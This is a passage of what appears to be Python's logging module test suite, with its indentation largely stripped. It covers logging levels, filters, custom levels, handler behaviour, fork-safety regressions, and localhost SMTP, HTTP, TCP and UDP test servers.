import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
self._threading_key = support.threading_setup()
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
manager = logging.getLogger().manager
manager.disable = 0
loggerDict = manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
self.doCleanups()
support.threading_cleanup(*self._threading_key)
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
# Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
def test_issue27935(self):
fatal = logging.getLevelName('FATAL')
self.assertEqual(fatal, logging.FATAL)
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
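#
# A brief illustrative sketch of the mapping-dictionary approach mentioned
# above (hypothetical names, not used by any test below): an application whose
# own verbosity values fall outside those limitations can translate them to
# logging levels on each call.
#
_APP_TO_LOGGING_LEVEL = {
    0: logging.ERROR,    # application "quiet"
    1: logging.WARNING,  # application "normal"
    2: logging.INFO,     # application "verbose"
    3: logging.DEBUG,    # application "debug"
}
def _log_at_app_level(logger, app_level, msg, *args):
    # Fall back to INFO for unrecognised application levels.
    logger.log(_APP_TO_LOGGING_LEVEL.get(app_level, logging.INFO), msg, *args)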
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fd, fn = tempfile.mkstemp()
os.close(fd)
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args)
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
# The implementation relies on os.register_at_fork existing, but we test
# based on os.fork existing because that is what users and this test use.
# This helps ensure that when fork exists (the important concept) that the
# register_at_fork mechanism is also present and used.
@unittest.skipIf(not hasattr(os, 'fork'), 'Test requires os.fork().')
def test_post_fork_child_no_deadlock(self):
"""Ensure child logging locks are not held; bpo-6721 & bpo-36533."""
class _OurHandler(logging.Handler):
def __init__(self):
super().__init__()
self.sub_handler = logging.StreamHandler(
stream=open('/dev/null', 'wt'))
def emit(self, record):
self.sub_handler.acquire()
try:
self.sub_handler.emit(record)
finally:
self.sub_handler.release()
self.assertEqual(len(logging._handlers), 0)
refed_h = _OurHandler()
self.addCleanup(refed_h.sub_handler.stream.close)
refed_h.name = 'because we need at least one for this test'
self.assertGreater(len(logging._handlers), 0)
self.assertGreater(len(logging._at_fork_reinit_lock_weakset), 1)
test_logger = logging.getLogger('test_post_fork_child_no_deadlock')
test_logger.addHandler(refed_h)
test_logger.setLevel(logging.DEBUG)
locks_held__ready_to_fork = threading.Event()
fork_happened__release_locks_and_end_thread = threading.Event()
def lock_holder_thread_fn():
logging._acquireLock()
try:
refed_h.acquire()
try:
# Tell the main thread to do the fork.
locks_held__ready_to_fork.set()
# If the deadlock bug exists, the fork will happen
# without dealing with the locks we hold, deadlocking
# the child.
# Wait for a successful fork or an unreasonable amount of
# time before releasing our locks. To avoid a timing based
# test we'd need communication from os.fork() as to when it
# has actually happened. Given this is a regression test
# for a fixed issue, potentially less reliably detecting
# regression via timing is acceptable for simplicity.
# The test will always take at least this long. :(
fork_happened__release_locks_and_end_thread.wait(0.5)
finally:
refed_h.release()
finally:
logging._releaseLock()
lock_holder_thread = threading.Thread(
target=lock_holder_thread_fn,
name='test_post_fork_child_no_deadlock lock holder')
lock_holder_thread.start()
locks_held__ready_to_fork.wait()
pid = os.fork()
if pid == 0:
# Child process
try:
test_logger.info(r'Child process did not deadlock. \o/')
finally:
os._exit(0)
else:
# Parent process
test_logger.info(r'Parent process returned from fork. \o/')
fork_happened__release_locks_and_end_thread.set()
lock_holder_thread.join()
support.wait_process(pid, exitcode=0)
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamWithIntName(object):
level = logging.NOTSET
name = 2
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
def test_stream_setting(self):
"""
Test setting the handler's stream
"""
h = logging.StreamHandler()
stream = io.StringIO()
old = h.setStream(stream)
self.assertIs(old, sys.stderr)
actual = h.setStream(old)
self.assertIs(actual, stream)
# test that setting to existing value returns None
actual = h.setStream(old)
self.assertIsNone(actual)
def test_can_represent_stream_with_int_name(self):
h = logging.StreamHandler(StreamWithIntName())
self.assertEqual(repr(h), '<StreamHandler 2 (NOTSET)>')
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self._quit = False
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
        t.daemon = True
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
while not self._quit:
asyncore.loop(poll_interval, map=self._map, count=1)
def stop(self):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
"""
self._quit = True
support.join_thread(self._thread)
self._thread = None
self.close()
asyncore.close_all(map=self._map, ignore_all=True)
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
        t.daemon = True
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self):
"""
Tell the server thread to stop, and wait for it to do so.
"""
self.shutdown()
if self._thread is not None:
support.join_thread(self._thread)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
                        the server will set up the socket and listen on it
                        (a brief sketch of this follows the class).
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
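# A minimal illustrative sketch (hypothetical helper, not exercised by any
# test below): with bind_and_activate=False the socket is not set up until
# server_bind() and server_activate() are called explicitly, as described in
# the TestTCPServer docstring above.
def _deferred_bind_sketch():
    srv = TestTCPServer(('localhost', 0), lambda request: None,
                        bind_and_activate=False)
    srv.server_bind()      # binds the socket and records srv.port
    srv.server_activate()  # starts listening
    srv.start()            # spawns the serving thread (ControlMixin)
    srv.ready.wait()       # as in the tests: wait for the serve loop to start
    srv.stop()             # shuts the thread down and closes the socket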
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
class SMTPHandlerTest(BaseTest):
# bpo-14314, bpo-19665, bpo-34092: don't wait forever
TIMEOUT = support.LONG_TIMEOUT
def test_basic(self):
sockmap = {}
server = TestSMTPServer((socket_helper.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (socket_helper.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT)
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
def test_race_between_set_target_and_flush(self):
class MockRaceConditionHandler:
def __init__(self, mem_hdlr):
self.mem_hdlr = mem_hdlr
self.threads = []
def removeTarget(self):
self.mem_hdlr.setTarget(None)
def handle(self, msg):
thread = threading.Thread(target=self.removeTarget)
self.threads.append(thread)
thread.start()
target = MockRaceConditionHandler(self.mem_hdlr)
try:
self.mem_hdlr.setTarget(target)
for _ in range(10):
time.sleep(0.005)
self.mem_logger.info("not flushed")
self.mem_logger.warning("flushed")
finally:
for thread in target.threads:
support.join_thread(thread)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
